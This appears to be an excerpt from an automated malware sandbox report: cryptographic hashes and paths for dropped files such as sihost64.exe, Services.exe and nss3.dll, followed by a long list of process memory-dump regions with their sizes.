a58b4f7e2c8e814a9bdd84362f554e07bc93eaf7

SHA256
a8a600735f68498af695ad4500fc153cb22ce6a04dc1e8db382a185af710368e

SHA512
5457ffd3cd953a1df98776d37218f94e88494d0263939860277661321b22aae605316d3061788282e9e3c303a9d4d27bbd7a1b376ac3204f3e8de64cf6fb3c08

Download Submit
C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe

MD5
05faed7f121c996f0c6c0b6f4e589202

SHA1
e2c2b553d7d3f881fbd6318d2d6d5afcff2efb53

SHA256
51a37ed6a20474cb765135681840abed6b1ed4b2ccb7575d59d3140bc6bd02f4

SHA512
d5536b5a62087c934b78b3c5514a5b4e7d629fc9598ed8f98d32d3a6cdedbb7ae3068c454af73c0704a4e48f2d58aca38e9dd0d20088eb213854a24fc6294eca

Download Submit
C:\Users\Admin\AppData\Roaming\WinCFG\Libs\sihost64.exe

MD5
05faed7f121c996f0c6c0b6f4e589202

SHA1
e2c2b553d7d3f881fbd6318d2d6d5afcff2efb53

SHA256
51a37ed6a20474cb765135681840abed6b1ed4b2ccb7575d59d3140bc6bd02f4

SHA512
d5536b5a62087c934b78b3c5514a5b4e7d629fc9598ed8f98d32d3a6cdedbb7ae3068c454af73c0704a4e48f2d58aca38e9dd0d20088eb213854a24fc6294eca

Download Submit
C:\Users\Admin\Services.exe

MD5
5e54a1c7a9157dfa8a6fd04ccbf552ee

SHA1
ee2007d8c10d5a5b6eeae1a28c3ec1b4614cbd3b

SHA256
8edeafcac47a8afdb8812fe48da3941e659a260e0509b67983a158d5debdd308

SHA512
32733a9ece59b0958c29e19e8d154af201e00146c3d4eca4792d2f83c914b5d2f16837999d2216721d5537836b4ddb0ec8b0c174959ce7daced2fbd3d61baae7

Download Submit
\Users\Admin\AppData\Local\Temp\D2ECD7E0\mozglue.dll

MD5
9e682f1eb98a9d41468fc3e50f907635

SHA1
85e0ceca36f657ddf6547aa0744f0855a27527ee

SHA256
830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d

SHA512
230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed

Download Submit
\Users\Admin\AppData\Local\Temp\D2ECD7E0\msvcp140.dll

MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
\Users\Admin\AppData\Local\Temp\D2ECD7E0\nss3.dll

MD5
556ea09421a0f74d31c4c0a89a70dc23

SHA1
f739ba9b548ee64b13eb434a3130406d23f836e3

SHA256
f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

SHA512
2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

Download Submit
\Users\Admin\AppData\Local\Temp\D2ECD7E0\vcruntime140.dll

MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
\Users\Admin\AppData\Local\Temp\D2ECD7E0\vcruntime140.dll

MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
\Users\Admin\AppData\Local\Temp\D2ECD7E0\vcruntime140.dll

MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
memory/340-245-0x0000000000000000-mapping.dmp

Download
memory/340-291-0x0000021DC6E43000-0x0000021DC6E45000-memory.dmp

Filesize
8KB

Download
memory/340-288-0x0000021DC6E40000-0x0000021DC6E42000-memory.dmp

Filesize
8KB

Download
memory/340-319-0x0000021DC6E10000-0x0000021DC6E32000-memory.dmp

Filesize
136KB

Download
memory/416-138-0x0000000000690000-0x0000000000698000-memory.dmp

Filesize
32KB

Download
memory/416-135-0x0000000000000000-mapping.dmp

Download
memory/416-139-0x0000000000690000-0x0000000000698000-memory.dmp

Filesize
32KB

Download
memory/584-131-0x0000000000000000-mapping.dmp

Download
memory/584-1137-0x0000000000000000-mapping.dmp

Download
memory/584-153-0x0000000002960000-0x0000000002961000-memory.dmp

Filesize
4KB

Download
memory/600-1129-0x0000000000000000-mapping.dmp

Download
memory/692-915-0x0000000000000000-mapping.dmp

Download
memory/748-1152-0x0000000000000000-mapping.dmp

Download
memory/808-1275-0x0000000000000000-mapping.dmp

Download
memory/1012-1031-0x0000000000000000-mapping.dmp

Download
memory/1020-1113-0x0000000000000000-mapping.dmp

Download
memory/1248-1145-0x0000000000000000-mapping.dmp

Download
memory/1368-127-0x00000000004C0000-0x0000000001636000-memory.dmp

Filesize
17.5MB

Download
memory/1368-124-0x0000000000000000-mapping.dmp

Download
memory/1368-128-0x00000000004C0000-0x0000000001636000-memory.dmp

Filesize
17.5MB

Download
memory/1460-320-0x0000022345AE0000-0x0000022345B02000-memory.dmp

Filesize
136KB

Download
memory/1460-254-0x0000000000000000-mapping.dmp

Download
memory/1460-296-0x000002232B500000-0x000002232B502000-memory.dmp

Filesize
8KB

Download
memory/1460-298-0x000002232B503000-0x000002232B505000-memory.dmp

Filesize
8KB

Download
memory/1508-912-0x0000000140002348-mapping.dmp

Download
memory/1516-274-0x0000015E72C33000-0x0000015E72C35000-memory.dmp

Filesize
8KB

Download
memory/1516-314-0x0000015E5A690000-0x0000015E5A6B2000-memory.dmp

Filesize
136KB

Download
memory/1516-271-0x0000015E72C30000-0x0000015E72C32000-memory.dmp

Filesize
8KB

Download
memory/1516-236-0x0000000000000000-mapping.dmp

Download
memory/1552-206-0x00000246B1FB0000-0x00000246B1FB2000-memory.dmp

Filesize
8KB

Download
memory/1552-226-0x00000246CBE83000-0x00000246CBE85000-memory.dmp

Filesize
8KB

Download
memory/1552-218-0x00000246CBE80000-0x00000246CBE82000-memory.dmp

Filesize
8KB

Download
memory/1552-208-0x00000246B1FB0000-0x00000246B1FB2000-memory.dmp

Filesize
8KB

Download
memory/1552-209-0x00000246B1FB0000-0x00000246B1FB2000-memory.dmp

Filesize
8KB

Download
memory/1552-204-0x00000246B1FB0000-0x00000246B1FB2000-memory.dmp

Filesize
8KB

Download
memory/1552-195-0x0000000000000000-mapping.dmp

Download
memory/1552-205-0x00000246B1FB0000-0x00000246B1FB2000-memory.dmp

Filesize
8KB

Download
memory/1552-321-0x00000246CE040000-0x00000246CE0B6000-memory.dmp

Filesize
472KB

Download
memory/1552-241-0x00000246CDE90000-0x00000246CDEB2000-memory.dmp

Filesize
136KB

Download
memory/1632-198-0x000002465DF20000-0x000002465DF22000-memory.dmp

Filesize
8KB

Download
memory/1632-200-0x000002465DF20000-0x000002465DF22000-memory.dmp

Filesize
8KB

Download
memory/1632-190-0x0000000000000000-mapping.dmp

Download
memory/1632-315-0x000002467A1D0000-0x000002467A246000-memory.dmp

Filesize
472KB

Download
memory/1632-197-0x000002465DF20000-0x000002465DF22000-memory.dmp

Filesize
8KB

Download
memory/1632-201-0x000002465DF20000-0x000002465DF22000-memory.dmp

Filesize
8KB

Download
memory/1632-202-0x000002465DF20000-0x000002465DF22000-memory.dmp

Filesize
8KB

Download
memory/1632-224-0x0000024678000000-0x0000024678022000-memory.dmp

Filesize
136KB

Download
memory/1632-213-0x00000246780F0000-0x00000246780F2000-memory.dmp

Filesize
8KB

Download
memory/1632-215-0x00000246780F3000-0x00000246780F5000-memory.dmp

Filesize
8KB

Download
memory/1632-350-0x00000246780F6000-0x00000246780F8000-memory.dmp

Filesize
8KB

Download
memory/1840-239-0x000001BDDC440000-0x000001BDDC442000-memory.dmp

Filesize
8KB

Download
memory/1840-266-0x000001BDDDDE3000-0x000001BDDDDE5000-memory.dmp

Filesize
8KB

Download
memory/1840-263-0x000001BDDDDE0000-0x000001BDDDDE2000-memory.dmp

Filesize
8KB

Download
memory/1840-207-0x0000000000000000-mapping.dmp

Download
memory/1840-275-0x000001BDDDFE0000-0x000001BDDE002000-memory.dmp

Filesize
136KB

Download
memory/1840-230-0x000001BDDC440000-0x000001BDDC442000-memory.dmp

Filesize
8KB

Download
memory/1840-234-0x000001BDDC440000-0x000001BDDC442000-memory.dmp

Filesize
8KB

Download
memory/1840-237-0x000001BDDC440000-0x000001BDDC442000-memory.dmp

Filesize
8KB

Download
memory/1840-349-0x000001BDF8600000-0x000001BDF8676000-memory.dmp

Filesize
472KB

Download
memory/1840-227-0x000001BDDC440000-0x000001BDDC442000-memory.dmp

Filesize
8KB

Download
memory/1964-824-0x0000000000000000-mapping.dmp

Download
memory/1972-957-0x0000000140002498-mapping.dmp

Download
memory/2168-261-0x0000000000000000-mapping.dmp

Download
memory/2168-322-0x000001BD57D90000-0x000001BD57DB2000-memory.dmp

Filesize
136KB

Download
memory/2168-306-0x000001BD57DF0000-0x000001BD57DF2000-memory.dmp

Filesize
8KB

Download
memory/2168-308-0x000001BD57DF3000-0x000001BD57DF5000-memory.dmp

Filesize
8KB

Download
memory/2192-217-0x0000000000000000-mapping.dmp

Download
memory/2192-299-0x00000184BCC70000-0x00000184BCC92000-memory.dmp

Filesize
136KB

Download
memory/2192-281-0x00000184BCCA3000-0x00000184BCCA5000-memory.dmp

Filesize
8KB

Download
memory/2192-278-0x00000184BCCA0000-0x00000184BCCA2000-memory.dmp

Filesize
8KB

Download
memory/2192-369-0x00000184BEE00000-0x00000184BEE76000-memory.dmp

Filesize
472KB

Download
memory/2192-242-0x00000184A4520000-0x00000184A4522000-memory.dmp

Filesize
8KB

Download
memory/2244-1367-0x0000000000000000-mapping.dmp

Download
memory/2280-259-0x0000000000000000-mapping.dmp

Download
memory/2320-225-0x00000139E1743000-0x00000139E1745000-memory.dmp

Filesize
8KB

Download
memory/2320-221-0x00000139E1740000-0x00000139E1742000-memory.dmp

Filesize
8KB

Download
memory/2320-333-0x00000139E3820000-0x00000139E3896000-memory.dmp

Filesize
472KB

Download
memory/2320-214-0x00000139C8F10000-0x00000139C8F12000-memory.dmp

Filesize
8KB

Download
memory/2320-257-0x00000139C90F0000-0x00000139C9112000-memory.dmp

Filesize
136KB

Download
memory/2320-212-0x00000139C8F10000-0x00000139C8F12000-memory.dmp

Filesize
8KB

Download
memory/2320-210-0x00000139C8F10000-0x00000139C8F12000-memory.dmp

Filesize
8KB

Download
memory/2320-220-0x00000139C8F10000-0x00000139C8F12000-memory.dmp

Filesize
8KB

Download
memory/2320-199-0x0000000000000000-mapping.dmp

Download
memory/2320-223-0x00000139C8F10000-0x00000139C8F12000-memory.dmp

Filesize
8KB

Download
memory/2360-1352-0x0000000000000000-mapping.dmp

Download
memory/2584-1028-0x0000000000000000-mapping.dmp

Download
memory/2624-121-0x0000000000000000-mapping.dmp

Download
memory/2680-115-0x0000000000000000-mapping.dmp

Download
memory/2692-1103-0x0000000000000000-mapping.dmp

Download
memory/2760-118-0x0000000000000000-mapping.dmp

Download
memory/2836-159-0x0000000005BE0000-0x0000000005C72000-memory.dmp

Filesize
584KB

Download
memory/2836-164-0x00000000033E0000-0x00000000033EA000-memory.dmp

Filesize
40KB

Download
memory/2836-178-0x0000000006601000-0x0000000006602000-memory.dmp

Filesize
4KB

Download
memory/2836-154-0x0000000006040000-0x000000000653E000-memory.dmp

Filesize
5.0MB

Download
memory/2836-147-0x0000000000DF0000-0x0000000000DF8000-memory.dmp

Filesize
32KB

Download
memory/2836-146-0x0000000000DF0000-0x0000000000DF8000-memory.dmp

Filesize
32KB

Download
memory/2836-129-0x0000000000000000-mapping.dmp

Download
memory/2924-1245-0x0000000000000000-mapping.dmp

Download
memory/2928-231-0x000001CA695B0000-0x000001CA695B2000-memory.dmp

Filesize
8KB

Download
memory/2928-222-0x000001CA50DE0000-0x000001CA50DE2000-memory.dmp

Filesize
8KB

Download
memory/2928-232-0x000001CA50DE0000-0x000001CA50DE2000-memory.dmp

Filesize
8KB

Download
memory/2928-233-0x000001CA695B3000-0x000001CA695B5000-memory.dmp

Filesize
8KB

Download
memory/2928-216-0x000001CA50DE0000-0x000001CA50DE2000-memory.dmp

Filesize
8KB

Download
memory/2928-203-0x0000000000000000-mapping.dmp

Download
memory/2928-229-0x000001CA50DE0000-0x000001CA50DE2000-memory.dmp

Filesize
8KB

Download
memory/2928-267-0x000001CA69530000-0x000001CA69552000-memory.dmp

Filesize
136KB

Download
memory/2928-219-0x000001CA50DE0000-0x000001CA50DE2000-memory.dmp

Filesize
8KB

Download
memory/2928-342-0x000001CA6B710000-0x000001CA6B786000-memory.dmp

Filesize
472KB

Download
memory/3028-301-0x0000019814E40000-0x0000019814E42000-memory.dmp

Filesize
8KB

Download
memory/3028-303-0x0000019814E43000-0x0000019814E45000-memory.dmp

Filesize
8KB

Download
memory/3028-228-0x0000000000000000-mapping.dmp

Download
memory/3028-376-0x0000019830FB0000-0x0000019831026000-memory.dmp

Filesize
472KB

Download
memory/3028-309-0x0000019830E00000-0x0000019830E22000-memory.dmp

Filesize
136KB

Download
memory/3212-913-0x0000000000000000-mapping.dmp

Download
memory/3652-283-0x0000000000D00000-0x0000000000E4A000-memory.dmp

Filesize
1.3MB

Download
memory/3652-247-0x0000000000000000-mapping.dmp

Download
memory/3656-302-0x0000000000E10000-0x0000000000E16000-memory.dmp

Filesize
24KB

Download
memory/3656-305-0x0000000000E10000-0x0000000000E16000-memory.dmp

Filesize
24KB

Download
memory/3656-285-0x0000000000000000-mapping.dmp

Download
memory/3664-235-0x0000024649740000-0x0000024649742000-memory.dmp

Filesize
8KB

Download
memory/3664-240-0x0000024649740000-0x0000024649742000-memory.dmp

Filesize
8KB

Download
memory/3664-211-0x0000000000000000-mapping.dmp

Download
memory/3664-238-0x0000024649740000-0x0000024649742000-memory.dmp

Filesize
8KB

Download
memory/3664-276-0x00000246636A3000-0x00000246636A5000-memory.dmp

Filesize
8KB

Download
memory/3664-269-0x00000246636A0000-0x00000246636A2000-memory.dmp

Filesize
8KB

Download
memory/3664-355-0x0000024665900000-0x0000024665976000-memory.dmp

Filesize
472KB

Download
memory/3664-284-0x0000024663620000-0x0000024663642000-memory.dmp

Filesize
136KB

Download
memory/3748-1357-0x0000000000000000-mapping.dmp

Download
memory/4072-156-0x00000159563D3000-0x00000159563D5000-memory.dmp

Filesize
8KB

Download
memory/4072-145-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-157-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-187-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-155-0x00000159563D0000-0x00000159563D2000-memory.dmp

Filesize
8KB

Download
memory/4072-176-0x00000159563D6000-0x00000159563D8000-memory.dmp

Filesize
8KB

Download
memory/4072-152-0x0000015958530000-0x00000159585A6000-memory.dmp

Filesize
472KB

Download
memory/4072-151-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-150-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-140-0x0000000000000000-mapping.dmp

Download
memory/4072-142-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-149-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-148-0x0000015956390000-0x00000159563B2000-memory.dmp

Filesize
136KB

Download
memory/4072-185-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-186-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-141-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-143-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4072-144-0x000001593C480000-0x000001593C482000-memory.dmp

Filesize
8KB

Download
memory/4104-504-0x0000000000000000-mapping.dmp

Download
memory/4128-1095-0x0000000000000000-mapping.dmp

Download
memory/4176-323-0x0000000000000000-mapping.dmp

Download
memory/4184-600-0x0000000000000000-mapping.dmp

Download
memory/4296-1346-0x0000000000000000-mapping.dmp

Download
memory/4384-614-0x0000000000000000-mapping.dmp

Download
memory/4392-914-0x0000000000000000-mapping.dmp

Download
memory/4424-1118-0x0000000000000000-mapping.dmp

Download
memory/4480-916-0x0000000000000000-mapping.dmp

Download
memory/4488-1141-0x0000000000000000-mapping.dmp

Download
memory/4748-523-0x0000000000000000-mapping.dmp

Download
memory/4848-424-0x0000000000000000-mapping.dmp

Download
memory/4980-1355-0x0000000140310068-mapping.dmp

Download
memory/5044-823-0x0000000000000000-mapping.dmp

Download